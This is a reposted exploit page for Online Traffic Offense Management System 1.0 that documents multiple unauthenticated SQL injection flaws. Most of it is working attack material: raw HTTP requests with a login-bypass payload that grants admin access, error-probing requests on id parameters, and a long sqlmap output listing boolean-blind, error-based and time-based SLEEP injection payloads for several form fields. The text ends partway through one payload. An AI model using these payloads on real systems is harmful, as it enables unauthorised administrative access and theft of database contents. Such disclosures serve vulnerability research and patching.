online traffic offense management system 1.0 multiple sql injection (unauthenticated)

▸▸▸ Exploit & Vulnerability >>   webapps exploit & php vulnerability




Online Vulnerability Scanner Tools
online traffic offense management system 1.0 multiple sql injection (unauthenticated) Code Code... 
				
# Exploit Title: Online Traffic Offense Management System 1.0 - Multiple SQL Injection (Unauthenticated)
# Date: 07/10/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### SQL Injection

# All requests can be sent by both an authenticated and a non-authenticated user

# Example vulnerable pages and parameters:

* http://localhost/traffic_offense/classes/Users.php
  Parameters:
  - id
  - firstname
  - lastname
  - username
  
* http://localhost/traffic_offense/classes/Login.php
  Parameters:
  - username
  - password
  
* http://localhost/traffic_offense/*/&id=1 [all pages where the id parameter is present]
  Parameters:
  - id
  
* http://localhost/traffic_offense/classes/Master.php
  Parameters:
  - id
  - date_created
  - ticket_no
  - status
  - offense_id
  - fine
  - code
  - name

-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------

## Example 1

# Login request generate sql injection error

POST /traffic_offense/classes/Login.php?f=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 30
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/login.php
Cookie: PHPSESSID=5vr3fm16tmrncov6j4amftftmi
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

username=xxxx'&password=xxxx2'

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2021 12:31:03 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 265
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Notice</b>:  Trying to get property 'num_rows' of non-object in <b>C:\xampp\htdocs\traffic_offense\classes\Login.php</b> on line <b>22</b><br />
{"status":"incorrect","last_qry":"SELECT * from users where username = 'xxxx'' and password = md5('xxxx2'') "}

-----------------------------------------------------------------------------------------------------------------------
# Exploitable request - login parameter can be any value

POST /traffic_offense/classes/Login.php?f=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 47
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/login.php
Cookie: PHPSESSID=5vr3fm16tmrncov6j4amftftmi
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

username=admin&password=xxxx')+or+'1'='1'+and+('1

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2021 12:24:50 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

{"status":"success"}

-----------------------------------------------------------------------------------------------------------------------
Logged as admin account

-----------------------------------------------------------------------------------------------------------------------

## Example 2

# Sql injection detection on the example of pages with the id parameter

# Login request generate sql error - add ' next to the id parameter

GET /traffic_offense/admin/offenses/view_details.php?id=3' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=offenses/manage_record
Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

#Response from database - sql error

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 03:56:37 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 7837
Connection: close
Content-Type: text/html; charset=UTF-8

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''3''' at line 1
SELECT r.*,d.license_id_no, d.name as driver from `offense_list` r inner join `drivers_list` on r.driver_id = d.id where r.id = '3'' <br />
<b>Notice</b>:  Trying to get property 'num_rows' of non-object in <b>C:\xampp\htdocs\traffic_offense\admin\offenses\view_details.php</b> on line <b>10</b><br />
<br />
<b>Notice</b>:  Trying to get property 'num_rows' of non-object in <b>C:\xampp\htdocs\traffic_offense\admin\offenses\view_details.php</b> on line <b>16</b>
[...]

# Request - add '' next to the id parameter

GET /traffic_offense/admin/offenses/view_details.php?id=3'' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=offenses/manage_record
Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

# Response did not return an error - sql injection confirmed

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 03:58:40 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 7214
Connection: close
Content-Type: text/html; charset=UTF-8

<div class="container-fluid">
    <div class="w-100 d-flex justify-content-end mb-2">
        <button class="btn btn-flat btn-sm btn-default bg-lightblue" type="button" id="print"><i class="fa fa-print"></i> Print</button>
        <button class="btn btn-flat btn-sm btn-default bg-black" data-dismiss="modal"><i class="fa fa-times"></i> Close</button>
    </div>
[...]

-----------------------------------------------------------------------------------------------------------------------

## Example 3

# Using sqlmap on an intercepted request http://localhost/traffic_offense/classes/Master.php

POST /traffic_offense/classes/Master.php?f=save_offense_record HTTP/1.1
Origin: http://localhost
Content-Length: 1598
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Sec-Fetch-Site: same-origin
Host: localhost:80
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Connection: close
X-Requested-With: XMLHttpRequest
Sec-Fetch-Mode: cors
Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7
Referer: http://localhost/traffic_offense/admin/?page=offenses/manage_record&id=1
Content-Type: multipart/form-data; boundary=---------------------------7900788429998101281579901385
Sec-Fetch-Dest: empty

-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

# Using the sqlmap utility

C:\Users\Hubert\Desktop\sqlmapproject-sqlmap-24e3b6a>sqlmap.py --level=5 --risk=3 --dbms=MySQL -r C:\Users\Hubert\Desktop\0day\sql2 --proxy=http://127.0.0.1:8090
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.5.9.6#dev}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:52:47 /2021-10-07/

[05:52:47] [INFO] parsing HTTP request from 'C:\Users\Hubert\Desktop\0day\sql2'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q]

Multipart-like data found in POST body. Do you want to process it? [Y/n/q]

[05:52:51] [INFO] testing connection to the target URL
[...]
---
Parameter: MULTIPART #4* ((custom) POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652' RLIKE (SELECT (CASE WHEN (8015=8015) THEN '' ELSE 0x28 END)) AND 'howi'='howi
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652' AND (SELECT 4940 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(4940=4940,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'zvbh'='zvbh
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652' AND (SELECT 7241 FROM (SELECT(SLEEP(5)))rEqK) AND 'CONm'='CONm
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

Parameter: MULTIPART #5* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3' AND 4015=4015 AND 'mPLR'='mPLR
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3' AND (SELECT 6830 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(6830=6830,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'pbeA'='pbeA
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3' AND (SELECT 5446 FROM (SELECT(SLEEP(5)))QMKi) AND 'GfhC'='GfhC
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

Parameter: MULTIPART #6* ((custom) POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001' RLIKE (SELECT (CASE WHEN (7186=7186) THEN '' ELSE 0x28 END)) AND 'rwJI'='rwJI
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001' AND (SELECT 2971 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(2971=2971,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OeqR'='OeqR
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001' AND (SELECT 5527 FROM (SELECT(SLEEP(5)))GfWJ) AND 'GtGB'='GtGB
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

Parameter: MULTIPART #2* ((custom) POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1' RLIKE (SELECT (CASE WHEN (8485=8485) THEN '' ELSE 0x28 END)) AND 'CyNe'='CyNe
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1' AND (SELECT 6653 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(6653=6653,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'tCsu'='tCsu
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1' AND (SELECT 6178 FROM (SELECT(SLEEP(5)))CQxQ) AND 'MljD'='MljD
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

Parameter: MULTIPART #3* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1' AND 5855=5855 AND 'broT'='broT
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1' AND (SELECT 9644 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(9644=9644,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'zaBh'='zaBh
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
